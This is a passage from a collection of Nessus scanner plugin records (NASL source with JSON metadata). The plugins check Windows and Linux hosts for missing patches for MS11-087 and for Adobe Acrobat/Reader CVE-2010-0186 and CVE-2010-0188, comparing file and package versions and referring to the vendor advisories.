Kernel-Mode Drivers Could Allow Remote Code Execution (2639417)\");\n script_summary(english:\"Checks version of win32k.sys\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows kernel is affected by a remote code execution\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is running a version of the Windows kernel that is\naffected by a remote code execution vulnerability. Specially crafted\nTrueType fonts are not properly handled, which could allow arbitrary\ncode execution in kernel mode. 
A remote attacker could exploit this\nvulnerability by tricking a user into viewing a specially crafted\nTrueType font (e.g., via web or email).\n\nThis vulnerability is reportedly being exploited in the wild by the Duqu\nmalware.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.crysys.hu/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.symantec.com/connect/w32_duqu_precursor_next_stuxnet\");\n # https://www.symantec.com/connect/w32-duqu_status-updates_installer-zero-day-exploit\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5829938d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2011/2639658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-087\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Windows XP, 2003, Vista,\n2008, 7, and 2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS11-087';\nkb = '2639417';\n\nkbs = make_list(kb);\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Win32k.sys\", version:\"6.1.7601.21866\", min_version:\"6.1.7601.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Win32k.sys\", version:\"6.1.7601.17730\", min_version:\"6.1.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Win32k.sys\", version:\"6.1.7600.21097\", min_version:\"6.1.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Win32k.sys\", version:\"6.1.7600.16920\", min_version:\"6.1.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows Vista / 2008\n 
hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Win32k.sys\", version:\"6.0.6002.22745\", min_version:\"6.0.6002.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Win32k.sys\", version:\"6.0.6002.18544\", min_version:\"6.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Win32k.sys\", version:\"5.2.3790.4938\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP 32-bit\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Win32k.sys\", version:\"5.1.2600.6178\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:46:10", "description": "This update of acroread fixes :\n\n - CVE-2010-0186: CVSS v2 Base Score: 5.8 Cross-domain request vulnerability\n\n - CVE-2010-0188: CVSS v2 Base Score: 6.8 An unspecified vulnerability that possibly allowed remote code execution.", "cvss3": {}, "published": "2010-03-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : acroread (acroread-2068)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-cmaps", "p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_cn", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_tw", "cpe:/o:novell:opensuse:11.2"], "id": "SUSE_11_2_ACROREAD-100225.NASL", "href": "https://www.tenable.com/plugins/nessus/44981", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package 
checks in this plugin were\n# extracted from openSUSE Security Update acroread-2068.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44981);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-2068)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of acroread fixes :\n\n - CVE-2010-0186: CVSS v2 Base Score: 5.8 Cross-domain\n request vulnerability\n\n - CVE-2010-0188: CVSS v2 Base Score: 6.8 An unspecified\n vulnerability that possibly allowed remote code\n execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=580470\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected acroread packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( 
rpm_check(release:\"SUSE11.2\", reference:\"acroread-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-cmaps-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ja-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ko-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_CN-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_TW-9.3.1-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:45:28", "description": "Updated acroread packages that fix two security issues and a bug are now available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable Document Format (PDF).\n\nThis update fixes two vulnerabilities in Adobe Reader. These vulnerabilities are summarized on the Adobe Security Advisory APSB10-07 page listed in the References section. A specially crafted PDF file could cause Adobe Reader to crash or, potentially, execute arbitrary code as the user running Adobe Reader when opened.\n(CVE-2010-0186, CVE-2010-0188)\n\nThis update also fixes a bug where, on some systems, attempting to install or upgrade the acroread packages failed due to a package dependency issue. (BZ#557506)\n\nAll Adobe Reader users should install these updated packages. They contain Adobe Reader version 9.3.1, which is not vulnerable to these issues and fixes this bug. 
All running instances of Adobe Reader must be restarted for the update to take effect.", "cvss3": {}, "published": "2010-02-19T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 : acroread (RHSA-2010:0114)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:acroread", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:acroread-plugin", "cpe:/o:redhat:enterprise_linux:5.4", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2010-0114.NASL", "href": "https://www.tenable.com/plugins/nessus/44665", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0114. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44665);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_bugtraq_id(38195, 38198);\n script_xref(name:\"RHSA\", value:\"2010:0114\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"RHEL 4 / 5 : acroread (RHSA-2010:0114)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated acroread packages that fix two security issues and a bug are\nnow available for Red Hat Enterprise Linux 4 Extras and Red Hat\nEnterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format 
(PDF).\n\nThis update fixes two vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-07 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2010-0186, CVE-2010-0188)\n\nThis update also fixes a bug where, on some systems, attempting to\ninstall or upgrade the acroread packages failed due to a package\ndependency issue. (BZ#557506)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.3.1, which is not vulnerable to these\nissues and fixes this bug. All running instances of Adobe Reader must\nbe restarted for the update to take effect.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-0186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-0188\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb10-07.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2010:0114\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected acroread and / or acroread-plugin packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-0188\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF 
Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0114\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-9.3.1-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-9.3.1-1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", 
reference:\"acroread-9.3.1-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-9.3.1-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:44:48", "description": "The version of Adobe Acrobat installed on the remote host is earlier than 9.3.1 / 8.2.1. Such versions are reportedly affected by multiple vulnerabilities :\n\n - An issue that could subvert the domain sandbox and make unauthorized cross-domain requests. (CVE-2010-0186)\n\n - An unspecified vulnerability could cause the application to crash or possibly lead to arbitrary code execution.\n (CVE-2010-0188)", "cvss3": {}, "published": "2010-02-17T00:00:00", "type": "nessus", "title": "Adobe Acrobat < 9.3.1 / 8.2.1 Multiple Vulnerabilities (APSB10-07)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB10-07.NASL", "href": "https://www.tenable.com/plugins/nessus/44643", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44643);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_bugtraq_id(38195, 38198);\n script_xref(name:\"Secunia\", value:\"38551\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Acrobat < 9.3.1 / 8.2.1 Multiple Vulnerabilities 
(APSB10-07)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.3.1 / 8.2.1. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - An issue that could subvert the domain sandbox and make\n unauthorized cross-domain requests. (CVE-2010-0186)\n\n - An unspecified vulnerability could cause the application\n to crash or possibly lead to arbitrary code execution.\n (CVE-2010-0188)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-07.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 9.3.1 / 8.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-0188\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/16\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Acrobat/Version\");\n\n exit(0);\n}\n\n\ninclude('global_settings.inc');\n\nversion = get_kb_item('SMB/Acrobat/Version');\nif (isnull(version)) exit(1, \"The 'SMB/Acrobat/Version' KB item is missing.\");\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 1) ||\n (ver[0] == 9 && ver[1] < 3) ||\n (ver[0] == 9 && ver[1] == 3 && ver[2] < 1)\n)\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n version_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\n if (report_verbosity > 0 && version_ui)\n {\n path = get_kb_item('SMB/Acrobat/Path');\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n'+\n ' Product : Adobe Acrobat\\n'+\n ' Path : '+path+'\\n'+\n ' Installed version : '+version_ui+'\\n'+\n ' Fixed version : 9.3.1 / 8.2.1\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse exit(0, \"The host is not affected since Adobe Acrobat \"+version+\" is installed.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:46:04", "description": "This update of acroread fixes :\n\n - Cross-domain request vulnerability. (CVE-2010-0186 :\n CVSS v2 Base Score: 5.8)\n\n - An unspecified vulnerability that possibly allowed remote code execution. 
(CVE-2010-0188 : CVSS v2 Base Score: 6.8)", "cvss3": {}, "published": "2010-03-04T00:00:00", "type": "nessus", "title": "SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 2065)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_cn", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_tw", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_ACROREAD-100225.NASL", "href": "https://www.tenable.com/plugins/nessus/44984", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44984);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 2065)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 11 host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of acroread fixes :\n\n - Cross-domain request vulnerability. (CVE-2010-0186 :\n CVSS v2 Base Score: 5.8)\n\n - An unspecified vulnerability that possibly allowed\n remote code execution. 
(CVE-2010-0188 : CVSS v2 Base\n Score: 6.8)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=580470\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-0186.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-0188.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply SAT patch number 2065.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", 